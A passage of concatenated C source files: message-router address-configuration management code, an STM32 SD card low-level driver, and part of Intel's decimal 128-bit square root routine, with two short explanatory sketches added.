both a 'prefix' and a 'pattern' attribute"; } if (fallback && (waypoint || in_phase > 0 || out_phase > 0)) { msg = "Fallback cannot be specified with waypoint or non-zero ingress and egress phases"; } if (msg) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = msg; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // validate the pattern/prefix, add "/#" if prefix pattern = qdra_config_address_validate_pattern_CT((prefix_field) ? 
prefix_field : pattern_field, !!prefix_field, &msg); if (!pattern) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = msg; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Handle the address-phasing logic. If the phases are provided, use them. Otherwise // use the waypoint flag to set the most common defaults. // if (in_phase == -1 && out_phase == -1) { in_phase = 0; out_phase = waypoint ? 1 : 0; } // // Validate the phase values // if (in_phase < 0 || in_phase > 9 || out_phase < 0 || out_phase > 9) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Phase values must be between 0 and 9"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Validate the priority values. // if (priority > QDR_MAX_PRIORITY ) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Priority value, if present, must be between 0 and QDR_MAX_PRIORITY"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // The request is valid. Attempt to insert the address pattern into // the parse tree, fail if there is already an entry for that pattern // addr = new_qdr_address_config_t(); if (!addr) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Out of memory"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } ZERO(addr); // // Insert the uninitialized address to check if it already exists in // the parse tree. On success initialize it. This is thread safe // since the current thread (core) is the only thread allowed to use // the parse tree // qd_error_t rc = qd_parse_tree_add_pattern_str(core->addr_parse_tree, pattern, addr); if (rc) { free_qdr_address_config_t(addr); query->status = QD_AMQP_BAD_REQUEST; query->status.description = qd_error_name(rc); qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } addr->ref_count = 1; // Represents the reference from the addr_config list addr->name = name ? (char*) qd_iterator_copy(name) : 0; addr->identity = qdr_identifier(core); addr->treatment = qdra_address_treatment_CT(distrib_field); addr->in_phase = in_phase; addr->out_phase = out_phase; addr->is_prefix = !!prefix_field; addr->pattern = pattern; addr->priority = priority; addr->fallback = fallback; pattern = 0; DEQ_INSERT_TAIL(core->addr_config, addr); if (name) { qd_iterator_view_t iter_view = qd_iterator_get_view(name); qd_iterator_reset_view(name, ITER_VIEW_ADDRESS_HASH); qd_hash_insert(core->addr_lr_al_hash, name, addr, &addr->hash_handle); qd_iterator_reset_view(name, iter_view); } // // Compose the result map for the response. // if (query->body) { qd_compose_start_map(query->body); for (int col = 0; col < QDR_CONFIG_ADDRESS_COLUMN_COUNT; col++) qdr_config_address_insert_column_CT(addr, col, query->body, true); qd_compose_end_map(query->body); } query->status = QD_AMQP_CREATED; break; } // // Enqueue the response if there is a body. If there is no body, this is a management // operation created internally by the configuration file parser. // if (query->body) { // // If there was an error in processing the create, insert a NULL value into the body. 
// if (query->status.status / 100 > 2) qd_compose_insert_null(query->body); qdr_agent_enqueue_response_CT(core, query); } else qdr_query_free(query); free(pattern); } static void qdr_manage_write_config_address_map_CT(qdr_core_t *core, qdr_address_config_t *addr, qd_composed_field_t *body, const char *qdr_config_address_columns[]) { qd_compose_start_map(body); for(int i = 0; i < QDR_CONFIG_ADDRESS_COLUMN_COUNT; i++) { qd_compose_insert_string(body, qdr_config_address_columns[i]); qdr_config_address_insert_column_CT(addr, i, body, false); } qd_compose_end_map(body); } void qdra_config_address_get_CT(qdr_core_t *core, qd_iterator_t *name, qd_iterator_t *identity, qdr_query_t *query, const char *qdr_config_address_columns[]) { qdr_address_config_t *addr = 0; if (!name && !identity) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "No name or identity provided"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing READ of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); } else { if (identity) //If there is identity, ignore the name addr = qdr_address_config_find_by_identity_CT(core, identity); else if (name) addr = qdr_address_config_find_by_name_CT(core, name); if (addr == 0) { // Send back a 404 query->status = QD_AMQP_NOT_FOUND; } else { // // Write the columns of the address entity into the response body. // qdr_manage_write_config_address_map_CT(core, addr, query->body, qdr_config_address_columns); query->status = QD_AMQP_OK; } } // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } // given an address pattern parsed field, validate it and convert it to a string char *qdra_config_address_validate_pattern_CT(qd_parsed_field_t *pattern_field, bool is_prefix, const char **error) { char *buf = NULL; char *pattern = NULL; uint8_t tag = qd_parse_tag(pattern_field); qd_iterator_t *p_iter = qd_parse_raw(pattern_field); int len = qd_iterator_length(p_iter); *error = NULL; if ((tag != QD_AMQP_STR8_UTF8 && tag != QD_AMQP_STR32_UTF8) || len == 0) { *error = ((is_prefix) ? "Prefix must be a non-empty string type" : "Pattern must be a non-empty string type"); goto exit; } buf = (char *)qd_iterator_copy(p_iter); char *begin = buf; // strip leading token separators // note: see parse_tree.c for acceptable separator characters while (*begin && strchr("./", *begin)) begin++; // strip trailing separators while (*begin) { char *end = &begin[strlen(begin) - 1]; if (!strchr("./", *end)) break; *end = 0; } if (*begin == 0) { *error = ((is_prefix) ? "Prefix invalid - no tokens" : "Pattern invalid - no tokens"); goto exit; } if (is_prefix) { // convert a prefix match into a valid pattern by appending "/#" pattern = malloc(strlen(begin) + 3); strcpy(pattern, begin); strcat(pattern, "/#"); } else { pattern = strdup(begin); } exit: free(buf); return pattern; }
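/*
 * Editor's note: a minimal, self-contained sketch of the prefix-to-pattern
 * normalization performed by qdra_config_address_validate_pattern_CT() above:
 * strip leading/trailing token separators ('.' and '/'), then append the
 * "/#" wildcard suffix. The function and example below are illustrative
 * only; they are not part of the dispatch router sources.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Returns a malloc'd pattern built from a prefix, or NULL if no tokens remain. */
static char *prefix_to_pattern(const char *prefix)
{
    char *buf = strdup(prefix);
    char *begin = buf;

    /* strip leading separators (see parse_tree.c for accepted characters) */
    while (*begin && strchr("./", *begin))
        begin++;

    /* strip trailing separators */
    size_t n = strlen(begin);
    while (n > 0 && strchr("./", begin[n - 1]))
        begin[--n] = '\0';

    if (*begin == '\0') {   /* nothing but separators: "no tokens" error case */
        free(buf);
        return NULL;
    }

    char *pattern = malloc(n + 3);   /* room for "/#" and the terminating NUL */
    strcpy(pattern, begin);
    strcat(pattern, "/#");
    free(buf);
    return pattern;
}

/* Example: "/queue/" normalizes to the pattern "queue/#". */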
300869.c
/** ****************************************************************************** * @file STM324x7i_eval.c * @author MCD Application Team * @version V1.0.0 * @date 11-January-2013 * @brief This file provides * - set of firmware functions to manage Leds, push-button and COM ports * - low level initialization functions for SD card (on SDIO) and * serial EEPROM (sEE) * available on STM324x7I-EVAL evaluation board(MB786) from * STMicroelectronics. ****************************************************************************** * @attention * * <h2><center>&copy; COPYRIGHT 2013 STMicroelectronics</center></h2> * * Licensed under MCD-ST Liberty SW License Agreement V2, (the "License"); * You may not use this file except in compliance with the License. * You may obtain a copy of the License at: * * http://www.st.com/software_license_agreement_liberty_v2 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * ****************************************************************************** */ /* Includes ------------------------------------------------------------------*/ #include "stm32f4xx_dma.h" #include "stm32f4xx_exti.h" #include "stm32f4xx_gpio.h" #include "stm32f4xx_rcc.h" #include "stm32f4xx_sdio.h" //#include "stm32f4xx_syscfg.h" #include "stm_misc.h" #include "stm324x7i_eval.h" //#include "stm32f4xx_i2c.h" /** * @brief DeInitializes the SDIO interface. * @param None * @retval None */ void SD_LowLevel_DeInit(void) { GPIO_InitTypeDef GPIO_InitStructure; /*!< Disable SDIO Clock */ SDIO_ClockCmd(DISABLE); /*!< Set Power State to OFF */ SDIO_SetPowerState(SDIO_PowerState_OFF); /*!< DeInitializes the SDIO peripheral */ SDIO_DeInit(); /* Disable the SDIO APB2 Clock */ RCC_APB2PeriphClockCmd(RCC_APB2Periph_SDIO, DISABLE); GPIO_PinAFConfig(GPIOC, GPIO_PinSource8, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource9, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource10, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource11, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource12, GPIO_AF_MCO); GPIO_PinAFConfig(GPIOD, GPIO_PinSource2, GPIO_AF_MCO); /* Configure PC.08, PC.09, PC.10, PC.11 pins: D0, D1, D2, D3 pins */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_8 | GPIO_Pin_9 | GPIO_Pin_10 | GPIO_Pin_11; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_NOPULL; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Configure PD.02 CMD line */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_2; GPIO_Init(GPIOD, &GPIO_InitStructure); /* Configure PC.12 pin: CLK pin */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_12; GPIO_Init(GPIOC, &GPIO_InitStructure); } /* Init just the detect pin. * This is so we can save power by not enabling the whole SD card interface, * yet still detect when a card is inserted. 
*/ void SD_LowLevel_Init_Detect(void) { /* Periph clock enable */ RCC_AHB1PeriphClockCmd(SD_DETECT_GPIO_CLK, ENABLE); /*!< Configure SD_SPI_DETECT_PIN pin: SD Card detect pin */ #if defined(PYBOARD3) // dpgeorge: PYBv2-v3: switch is normally open, connected to VDD when card inserted GPIO_InitTypeDef GPIO_InitStructure; GPIO_InitStructure.GPIO_Pin = SD_DETECT_PIN; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_2MHz; // needs to be 2MHz due to restrictions on PC13 GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_DOWN; GPIO_Init(SD_DETECT_GPIO_PORT, &GPIO_InitStructure); #elif defined(PYBOARD4) // dpgeorge: PYBv4: switch is normally open, connected to GND when card inserted GPIO_InitTypeDef GPIO_InitStructure; GPIO_InitStructure.GPIO_Pin = SD_DETECT_PIN; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_2MHz; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_IN; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(SD_DETECT_GPIO_PORT, &GPIO_InitStructure); #endif } /** * @brief Initializes the SD Card and put it into StandBy State (Ready for * data transfer). * @param None * @retval None */ void SD_LowLevel_Init(void) { // init the detect pin first SD_LowLevel_Init_Detect(); GPIO_InitTypeDef GPIO_InitStructure; /* GPIOC and GPIOD Periph clock enable */ RCC_AHB1PeriphClockCmd(RCC_AHB1Periph_GPIOC | RCC_AHB1Periph_GPIOD | SD_DETECT_GPIO_CLK, ENABLE); GPIO_PinAFConfig(GPIOC, GPIO_PinSource8, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource9, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource10, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource11, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOC, GPIO_PinSource12, GPIO_AF_SDIO); GPIO_PinAFConfig(GPIOD, GPIO_PinSource2, GPIO_AF_SDIO); /* Configure PC.08, PC.09, PC.10, PC.11 pins: D0, D1, D2, D3 pins */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_8 | GPIO_Pin_9 | GPIO_Pin_10 | GPIO_Pin_11; GPIO_InitStructure.GPIO_Speed = GPIO_Speed_25MHz; GPIO_InitStructure.GPIO_Mode = GPIO_Mode_AF; GPIO_InitStructure.GPIO_OType = GPIO_OType_PP; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_UP; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Configure PD.02 CMD line */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_2; GPIO_Init(GPIOD, &GPIO_InitStructure); /* Configure PC.12 pin: CLK pin */ GPIO_InitStructure.GPIO_Pin = GPIO_Pin_12; GPIO_InitStructure.GPIO_PuPd = GPIO_PuPd_NOPULL; GPIO_Init(GPIOC, &GPIO_InitStructure); /* Enable the SDIO APB2 Clock */ RCC_APB2PeriphClockCmd(RCC_APB2Periph_SDIO, ENABLE); /* Enable the DMA2 Clock */ RCC_AHB1PeriphClockCmd(SD_SDIO_DMA_CLK, ENABLE); } /** * @brief Configures the DMA2 Channel4 for SDIO Tx request. 
* @param BufferSRC: pointer to the source buffer * @param BufferSize: buffer size * @retval None */ void SD_LowLevel_DMA_TxConfig(uint32_t *BufferSRC, uint32_t BufferSize) { DMA_InitTypeDef SDDMA_InitStructure; DMA_ClearFlag(SD_SDIO_DMA_STREAM, SD_SDIO_DMA_FLAG_FEIF | SD_SDIO_DMA_FLAG_DMEIF | SD_SDIO_DMA_FLAG_TEIF | SD_SDIO_DMA_FLAG_HTIF | SD_SDIO_DMA_FLAG_TCIF); /* DMA2 Stream3 or Stream6 disable */ DMA_Cmd(SD_SDIO_DMA_STREAM, DISABLE); /* DMA2 Stream3 or Stream6 Config */ DMA_DeInit(SD_SDIO_DMA_STREAM); SDDMA_InitStructure.DMA_Channel = SD_SDIO_DMA_CHANNEL; SDDMA_InitStructure.DMA_PeripheralBaseAddr = (uint32_t)SDIO_FIFO_ADDRESS; SDDMA_InitStructure.DMA_Memory0BaseAddr = (uint32_t)BufferSRC; SDDMA_InitStructure.DMA_DIR = DMA_DIR_MemoryToPeripheral; SDDMA_InitStructure.DMA_BufferSize = BufferSize; SDDMA_InitStructure.DMA_PeripheralInc = DMA_PeripheralInc_Disable; SDDMA_InitStructure.DMA_MemoryInc = DMA_MemoryInc_Enable; SDDMA_InitStructure.DMA_PeripheralDataSize = DMA_PeripheralDataSize_Word; SDDMA_InitStructure.DMA_MemoryDataSize = DMA_MemoryDataSize_Word; SDDMA_InitStructure.DMA_Mode = DMA_Mode_Normal; SDDMA_InitStructure.DMA_Priority = DMA_Priority_VeryHigh; SDDMA_InitStructure.DMA_FIFOMode = DMA_FIFOMode_Enable; SDDMA_InitStructure.DMA_FIFOThreshold = DMA_FIFOThreshold_Full; SDDMA_InitStructure.DMA_MemoryBurst = DMA_MemoryBurst_INC4; SDDMA_InitStructure.DMA_PeripheralBurst = DMA_PeripheralBurst_INC4; DMA_Init(SD_SDIO_DMA_STREAM, &SDDMA_InitStructure); DMA_ITConfig(SD_SDIO_DMA_STREAM, DMA_IT_TC, ENABLE); DMA_FlowControllerConfig(SD_SDIO_DMA_STREAM, DMA_FlowCtrl_Peripheral); /* DMA2 Stream3 or Stream6 enable */ DMA_Cmd(SD_SDIO_DMA_STREAM, ENABLE); } /** * @brief Configures the DMA2 Channel4 for SDIO Rx request. * @param BufferDST: pointer to the destination buffer * @param BufferSize: buffer size * @retval None */ void SD_LowLevel_DMA_RxConfig(uint32_t *BufferDST, uint32_t BufferSize) { DMA_InitTypeDef SDDMA_InitStructure; DMA_ClearFlag(SD_SDIO_DMA_STREAM, SD_SDIO_DMA_FLAG_FEIF | SD_SDIO_DMA_FLAG_DMEIF | SD_SDIO_DMA_FLAG_TEIF | SD_SDIO_DMA_FLAG_HTIF | SD_SDIO_DMA_FLAG_TCIF); /* DMA2 Stream3 or Stream6 disable */ DMA_Cmd(SD_SDIO_DMA_STREAM, DISABLE); /* DMA2 Stream3 or Stream6 Config */ DMA_DeInit(SD_SDIO_DMA_STREAM); SDDMA_InitStructure.DMA_Channel = SD_SDIO_DMA_CHANNEL; SDDMA_InitStructure.DMA_PeripheralBaseAddr = (uint32_t)SDIO_FIFO_ADDRESS; SDDMA_InitStructure.DMA_Memory0BaseAddr = (uint32_t)BufferDST; SDDMA_InitStructure.DMA_DIR = DMA_DIR_PeripheralToMemory; SDDMA_InitStructure.DMA_BufferSize = BufferSize; SDDMA_InitStructure.DMA_PeripheralInc = DMA_PeripheralInc_Disable; SDDMA_InitStructure.DMA_MemoryInc = DMA_MemoryInc_Enable; SDDMA_InitStructure.DMA_PeripheralDataSize = DMA_PeripheralDataSize_Word; SDDMA_InitStructure.DMA_MemoryDataSize = DMA_MemoryDataSize_Word; SDDMA_InitStructure.DMA_Mode = DMA_Mode_Normal; SDDMA_InitStructure.DMA_Priority = DMA_Priority_VeryHigh; SDDMA_InitStructure.DMA_FIFOMode = DMA_FIFOMode_Enable; SDDMA_InitStructure.DMA_FIFOThreshold = DMA_FIFOThreshold_Full; SDDMA_InitStructure.DMA_MemoryBurst = DMA_MemoryBurst_INC4; SDDMA_InitStructure.DMA_PeripheralBurst = DMA_PeripheralBurst_INC4; DMA_Init(SD_SDIO_DMA_STREAM, &SDDMA_InitStructure); DMA_ITConfig(SD_SDIO_DMA_STREAM, DMA_IT_TC, ENABLE); DMA_FlowControllerConfig(SD_SDIO_DMA_STREAM, DMA_FlowCtrl_Peripheral); /* DMA2 Stream3 or Stream6 enable */ DMA_Cmd(SD_SDIO_DMA_STREAM, ENABLE); } /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
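/*
 * Editor's note: a hedged usage sketch of the helpers above. In ST's eval
 * BSP the higher-level SD driver (sdio_sd.c) sequences these calls; the
 * function below is illustrative only. The buffer must be word-aligned,
 * and because the stream is configured with DMA_FlowCtrl_Peripheral, the
 * SDIO data counter -- not the BufferSize argument -- terminates the
 * transfer.
 */
static uint32_t sd_block_buf[512 / 4];

static void sd_read_one_block_sketch(void)
{
    SD_LowLevel_Init();                        /* pins, SDIO and DMA clocks */
    /* ... card identification/selection command sequence goes here ... */
    SD_LowLevel_DMA_RxConfig(sd_block_buf, 512 / 4);
    /* ... send the SDIO READ_SINGLE_BLOCK command, then wait for the DMA
       transfer-complete interrupt before using sd_block_buf ... */
}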
487066.c
/****************************************************************************** Copyright (c) 2007-2011, Intel Corp. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Intel Corporation nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ******************************************************************************/ #define BID_128RES #define BID_FUNCTION_SETS_BINARY_FLAGS #include "bid_internal.h" #include "bid_sqrt_macros.h" BID128_FUNCTION_ARG1 (bid128_sqrt, x) BID_UINT256 M256, C256, C4, C8; BID_UINT128 CX, CX1, CX2, A10, S2, T128, TP128, CS, CSM, res; BID_UINT64 sign_x, Carry; BID_SINT64 D; int_float fx, f64; int exponent_x, bin_expon_cx; int digits, scale, exponent_q; BID_OPT_SAVE_BINARY_FLAGS() // unpack arguments, check for NaN or Infinity if (!unpack_BID128_value (&sign_x, &exponent_x, &CX, x)) { res.w[1] = CX.w[1]; res.w[0] = CX.w[0]; // NaN ? if ((x.w[1] & 0x7c00000000000000ull) == 0x7c00000000000000ull) { #ifdef BID_SET_STATUS_FLAGS if ((x.w[1] & 0x7e00000000000000ull) == 0x7e00000000000000ull) // sNaN __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif res.w[1] = CX.w[1] & QUIET_MASK64; BID_RETURN (res); } // x is Infinity? 
if ((x.w[1] & 0x7800000000000000ull) == 0x7800000000000000ull) { res.w[1] = CX.w[1]; if (sign_x) { // -Inf, return NaN res.w[1] = 0x7c00000000000000ull; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif } BID_RETURN (res); } // x is 0 otherwise res.w[1] = sign_x | ((((BID_UINT64) (exponent_x + DECIMAL_EXPONENT_BIAS_128)) >> 1) << 49); res.w[0] = 0; BID_RETURN (res); } if (sign_x) { res.w[1] = 0x7c00000000000000ull; res.w[0] = 0; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif BID_RETURN (res); } #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fegetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif // 2^64 f64.i = 0x5f800000; // fx ~ CX fx.d = (float) CX.w[1] * f64.d + (float) CX.w[0]; bin_expon_cx = ((fx.i >> 23) & 0xff) - 0x7f; digits = bid_estimate_decimal_digits[bin_expon_cx]; A10 = CX; if (exponent_x & 1) { A10.w[1] = (CX.w[1] << 3) | (CX.w[0] >> 61); A10.w[0] = CX.w[0] << 3; CX2.w[1] = (CX.w[1] << 1) | (CX.w[0] >> 63); CX2.w[0] = CX.w[0] << 1; __add_128_128 (A10, A10, CX2); } CS.w[0] = short_sqrt128 (A10); CS.w[1] = 0; // check for exact result if (CS.w[0] * CS.w[0] == A10.w[0]) { __mul_64x64_to_128_fast (S2, CS.w[0], CS.w[0]); if (S2.w[1] == A10.w[1]) // && S2.w[0]==A10.w[0]) { bid_get_BID128_very_fast (&res, 0, (exponent_x + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } } // get number of digits in CX D = CX.w[1] - bid_power10_index_binexp_128[bin_expon_cx].w[1]; if (D > 0 || (!D && CX.w[0] >= bid_power10_index_binexp_128[bin_expon_cx].w[0])) digits++; // if exponent is odd, scale coefficient by 10 scale = 67 - digits; exponent_q = exponent_x - scale; scale += (exponent_q & 1); // exp. 
bias is even if (scale > 38) { T128 = bid_power10_table_128[scale - 37]; __mul_128x128_low (CX1, CX, T128); TP128 = bid_power10_table_128[37]; __mul_128x128_to_256 (C256, CX1, TP128); } else { T128 = bid_power10_table_128[scale]; __mul_128x128_to_256 (C256, CX, T128); } // 4*C256 C4.w[3] = (C256.w[3] << 2) | (C256.w[2] >> 62); C4.w[2] = (C256.w[2] << 2) | (C256.w[1] >> 62); C4.w[1] = (C256.w[1] << 2) | (C256.w[0] >> 62); C4.w[0] = C256.w[0] << 2; bid_long_sqrt128 (&CS, C256); //printf("C256=%016I64x %016I64x %016I64x %016I64x, CS=%016I64x %016I64x \n",C256.w[3],C256.w[2],C256.w[1],C256.w[0],CS.w[1],CS.w[0]); #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY if (!((rnd_mode) & 3)) { #endif #endif // compare to midpoints CSM.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); CSM.w[0] = (CS.w[0] + CS.w[0]) | 1; // CSM^2 //__mul_128x128_to_256(M256, CSM, CSM); __sqr128_to_256 (M256, CSM); if (C4.w[3] > M256.w[3] || (C4.w[3] == M256.w[3] && (C4.w[2] > M256.w[2] || (C4.w[2] == M256.w[2] && (C4.w[1] > M256.w[1] || (C4.w[1] == M256.w[1] && C4.w[0] > M256.w[0])))))) { // round up CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } else { C8.w[1] = (CS.w[1] << 3) | (CS.w[0] >> 61); C8.w[0] = CS.w[0] << 3; // M256 - 8*CSM __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; // if CSM' > C256, round up if (M256.w[3] > C4.w[3] || (M256.w[3] == C4.w[3] && (M256.w[2] > C4.w[2] || (M256.w[2] == C4.w[2] && (M256.w[1] > C4.w[1] || (M256.w[1] == C4.w[1] && M256.w[0] > C4.w[0])))))) { // round down if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } #ifndef IEEE_ROUND_NEAREST #ifndef IEEE_ROUND_NEAREST_TIES_AWAY } else { __sqr128_to_256 (M256, CS); C8.w[1] = (CS.w[1] << 1) | (CS.w[0] >> 63); C8.w[0] = CS.w[0] << 1; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { __sub_borrow_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __sub_borrow_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __sub_borrow_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] - Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (!CS.w[0]) CS.w[1]--; CS.w[0]--; if (M256.w[3] > C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] > C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] > C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] > C256.w[0])))))) { if (!CS.w[0]) CS.w[1]--; CS.w[0]--; } } else { __add_carry_out (M256.w[0], Carry, M256.w[0], C8.w[0]); __add_carry_in_out (M256.w[1], Carry, M256.w[1], C8.w[1], Carry); __add_carry_in_out (M256.w[2], Carry, M256.w[2], 0, Carry); M256.w[3] = M256.w[3] + Carry; M256.w[0]++; if (!M256.w[0]) { M256.w[1]++; if (!M256.w[1]) { M256.w[2]++; if (!M256.w[2]) M256.w[3]++; } } if (M256.w[3] < C256.w[3] || (M256.w[3] == C256.w[3] && (M256.w[2] < C256.w[2] || (M256.w[2] == C256.w[2] && (M256.w[1] < C256.w[1] || (M256.w[1] == C256.w[1] && M256.w[0] <= C256.w[0])))))) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } // RU? 
if ((rnd_mode) == BID_ROUNDING_UP) { CS.w[0]++; if (!CS.w[0]) CS.w[1]++; } } #endif #endif #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INEXACT_EXCEPTION); #endif bid_get_BID128_fast (&res, 0, (exponent_q + DECIMAL_EXPONENT_BIAS_128) >> 1, CS); #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) fesetexceptflag (&binaryflags, BID_FE_ALL_FLAGS); #endif BID_RETURN (res); } BID128_FUNCTION_ARGTYPE1 (bid128d_sqrt, BID_UINT64, x) BID_UINT256 M256, C256, C4, C8; BID_UINT128 CX, CX1, CX2, A10, S2, T128, TP128, CS, CSM, res; BID_UINT64 sign_x, Carry; BID_SINT64 D; int_float fx, f64; int exponent_x, bin_expon_cx; int digits, scale, exponent_q; BID_OPT_SAVE_BINARY_FLAGS() // unpack arguments, check for NaN or Infinity // unpack arguments, check for NaN or Infinity CX.w[1] = 0; if (!unpack_BID64 (&sign_x, &exponent_x, &CX.w[0], x)) { res.w[1] = CX.w[0]; res.w[0] = 0; // NaN ? if ((x & 0x7c00000000000000ull) == 0x7c00000000000000ull) { #ifdef BID_SET_STATUS_FLAGS if ((x & SNAN_MASK64) == SNAN_MASK64) // sNaN __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif res.w[0] = (CX.w[0] & 0x0003ffffffffffffull); __mul_64x64_to_128 (res, res.w[0], bid_power10_table_128[18].w[0]); res.w[1] |= ((CX.w[0]) & 0xfc00000000000000ull); BID_RETURN (res); } // x is Infinity? if ((x & 0x7800000000000000ull) == 0x7800000000000000ull) { if (sign_x) { // -Inf, return NaN res.w[1] = 0x7c00000000000000ull; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif } BID_RETURN (res); } // x is 0 otherwise exponent_x = exponent_x - DECIMAL_EXPONENT_BIAS + DECIMAL_EXPONENT_BIAS_128; res.w[1] = sign_x | ((((BID_UINT64) (exponent_x + DECIMAL_EXPONENT_BIAS_128)) >> 1) << 49); res.w[0] = 0; BID_RETURN (res); } if (sign_x) { res.w[1] = 0x7c00000000000000ull; res.w[0] = 0; #ifdef BID_SET_STATUS_FLAGS __set_status_flags (pfpsf, BID_INVALID_EXCEPTION); #endif BID_RETURN (res); } #ifdef UNCHANGED_BINARY_STATUS_FLAGS // (void) 